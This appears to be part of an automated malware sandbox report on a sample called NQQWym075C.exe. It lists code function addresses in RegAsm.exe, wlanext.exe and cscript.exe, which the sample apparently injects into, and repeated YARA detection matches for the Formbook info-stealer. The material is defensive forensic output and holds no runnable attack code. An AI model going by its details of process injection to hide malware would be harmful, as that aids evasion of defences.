Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E28EC	2_2_030E28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030EDFCE	2_2_030EDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E1FF1	2_2_030E1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DD616	2_2_030DD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03036E30	2_2_03036E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E2EF7	2_2_030E2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E2D07	2_2_030E2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03010D20	2_2_03010D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E1D55	2_2_030E1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042581	2_2_03042581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E25DD	2_2_030E25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302D5E0	2_2_0302D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302841F	2_2_0302841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DD466	2_2_030DD466
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_00B6FF88	4_2_00B6FF88
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_00B6F37F	4_2_00B6F37F
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_02CC04E1	4_2_02CC04E1
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_02CC04F0	4_2_02CC04F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041B99F	5_2_0041B99F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041CB27	5_2_0041CB27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00408C2C	5_2_00408C2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00408C30	5_2_00408C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041C53B	5_2_0041C53B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00402D88	5_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041BD88	5_2_0041BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4AEF	5_2_02FB4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC22AE	5_2_02FC22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B236	5_2_02F1B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FAFA2B	5_2_02FAFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FA23E3	5_2_02FA23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB03DA	5_2_02FB03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FBDBD2	5_2_02FBDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2ABD8	5_2_02F2ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2EBB0	5_2_02F2EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2138B	5_2_02F2138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1AB40	5_2_02F1AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F9CB4F	5_2_02F9CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC2B28	5_2_02FC2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC28EC	5_2_02FC28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F220A0	5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC20A8	5_2_02FC20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0B090	5_2_02F0B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A830	5_2_02F1A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FCE824	5_2_02FCE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB1002	5_2_02FB1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F14120	5_2_02F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFF900	5_2_02EFF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC2EF7	5_2_02FC2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F16E30	5_2_02F16E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FBD616	5_2_02FBD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC1FF1	5_2_02FC1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FCDFCE	5_2_02FCDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB4496	5_2_02FB4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B477	5_2_02F1B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FBD466	5_2_02FBD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0841F	5_2_02F0841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0D5E0	5_2_02F0D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC25DD	5_2_02FC25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F22581	5_2_02F22581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB2D82	5_2_02FB2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC1D55	5_2_02FC1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF0D20	5_2_02EF0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC2D07	5_2_02FC2D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0373AB40	6_2_0373AB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037BCB4F	6_2_037BCB4F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E2B28	6_2_037E2B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0373A309	6_2_0373A309
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037C23E3	6_2_037C23E3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037D03DA	6_2_037D03DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0374ABD8	6_2_0374ABD8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037DDBD2	6_2_037DDBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0374EBB0	6_2_0374EBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0374138B	6_2_0374138B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0373B236	6_2_0373B236
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037CFA2B	6_2_037CFA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037D4AEF	6_2_037D4AEF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E22AE	6_2_037E22AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03734120	6_2_03734120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0371F900	6_2_0371F900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037399BF	6_2_037399BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0373A830	6_2_0373A830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037EE824	6_2_037EE824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037D1002	6_2_037D1002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E28EC	6_2_037E28EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037420A0	6_2_037420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E20A8	6_2_037E20A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0372B090	6_2_0372B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E1FF1	6_2_037E1FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037EDFCE	6_2_037EDFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03736E30	6_2_03736E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037DD616	6_2_037DD616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E2EF7	6_2_037E2EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E1D55	6_2_037E1D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03710D20	6_2_03710D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E2D07	6_2_037E2D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0372D5E0	6_2_0372D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037E25DD	6_2_037E25DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03742581	6_2_03742581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037D2D82	6_2_037D2D82
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0373B477	6_2_0373B477
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037DD466	6_2_037DD466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0372841F	6_2_0372841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037D4496	6_2_037D4496
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325CB27	6_2_0325CB27
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325B954	6_2_0325B954
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325B998	6_2_0325B998
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03242FB0	6_2_03242FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325C53B	6_2_0325C53B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03242D88	6_2_03242D88
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325BD88	6_2_0325BD88
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03242D90	6_2_03242D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03248C2C	6_2_03248C2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03248C30	6_2_03248C30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047BB477	10_2_047BB477
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04854496	10_2_04854496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047A841F	10_2_047A841F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0485D466	10_2_0485D466
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04852D82	10_2_04852D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04790D20	10_2_04790D20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_048625DD	10_2_048625DD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04862D07	10_2_04862D07
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047AD5E0	10_2_047AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04861D55	10_2_04861D55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047C2581	10_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04841EB6	10_2_04841EB6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047B6E30	10_2_047B6E30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04862EF7	10_2_04862EF7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047B5600	10_2_047B5600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0485D616	10_2_0485D616
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0486DFCE	10_2_0486DFCE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04861FF1	10_2_04861FF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_048620A8	10_2_048620A8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047BA830	10_2_047BA830
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_048628EC	10_2_048628EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04851002	10_2_04851002
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0486E824	10_2_0486E824
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047C20A0	10_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047AB090	10_2_047AB090
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047B4120	10_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0479F900	10_2_0479F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047B99BF	10_2_047B99BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_048622AE	10_2_048622AE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047BB236	10_2_047BB236
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04854AEF	10_2_04854AEF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0484FA2B	10_2_0484FA2B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047BAB40	10_2_047BAB40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0485DBD2	10_2_0485DBD2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_048503DA	10_2_048503DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_048423E3	10_2_048423E3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047BA309	10_2_047BA309
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047CABD8	10_2_047CABD8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_04862B28	10_2_04862B28
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047CEBB0	10_2_047CEBB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0483CB4F	10_2_0483CB4F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047BEB9A	10_2_047BEB9A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047C138B	10_2_047C138B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0297CB27	10_2_0297CB27
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0297B998	10_2_0297B998
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0297B954	10_2_0297B954
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02962FB0	10_2_02962FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02968C30	10_2_02968C30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02968C2C	10_2_02968C2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02962D90	10_2_02962D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02962D88	10_2_02962D88
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0297BD88	10_2_0297BD88
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0297C53B	10_2_0297C53B

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 0371B150 appears 136 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02EFB150 appears 136 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0301B150 appears 48 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00419F30 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041A060 appears 50 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0479B150 appears 145 times

Source: NQQWym075C.exe, 00000004.00000002.498473507.0000000005F80000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamenbqzOvmZAbSHtViT.bounce.exe4 vs NQQWym075C.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior

Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
